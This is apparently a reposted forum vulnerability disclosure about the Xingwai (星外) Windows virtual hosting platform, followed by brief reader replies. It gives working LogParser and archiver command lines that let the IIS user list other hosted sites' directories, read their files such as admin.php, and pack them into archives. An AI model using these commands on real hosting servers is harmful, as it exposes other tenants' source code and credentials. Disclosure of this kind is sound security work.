星外虚拟主机跨web目录文件读取漏洞
简要描述:星外虚拟主机跨目录读取文件漏洞,需要一定条件。
详细说明:
问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令:
c:\windows\7i24IISLOG.exe
c:\windows\7i24IISLOG2.exe
c:\windows\7i24IISLOG3.exe
c:\windows\7i24IISLOG4.exe
c:\windows\7i24tool.exe
c:\windows\rsb.exe
这些文件貌似是星外处理日志、设置权限的,其中的7i24IISLOG.exe其实就是LogParser,LogParser是一款强大日志分析工具,下面利用它来列web目录:
c:\windows\7i24IISLOG"select top 100 path from e:\host\*.*" -i:FS -rtp:-1
读取其中一个站的目录信息:
c:\windows\7i24IISLOG"select top 100 path from e:\host\0233ab\*.*" -i:FS -rtp:-1
下面读取文件内容:
c:\windows\7i24IISLOG "select text from e:\host\0233ab\web\admin.php" -i:textline -rtp:-1
7i24IISLOG3.exe能够打包ISO文件,利用它同样的也可以列出目录文件信息:
c:\windows\7i24IISLOG3 e:\host\0233ab\web\ c:\windows\temp\123.rar
同样的还有rbs.exe
c:\windows\rbs -r -v 024dbjj e:\host\0233ab\web\*.*
这是神奇的JJ吗?
不过这个很久以前在乌云看过了..确实帮助不少..:lol 支持原创! 这个必须要支持@ 鸡鸡这是要团队的节奏啊 有点用吧。。不过是转的 感谢分享。支持一下
页:
[1]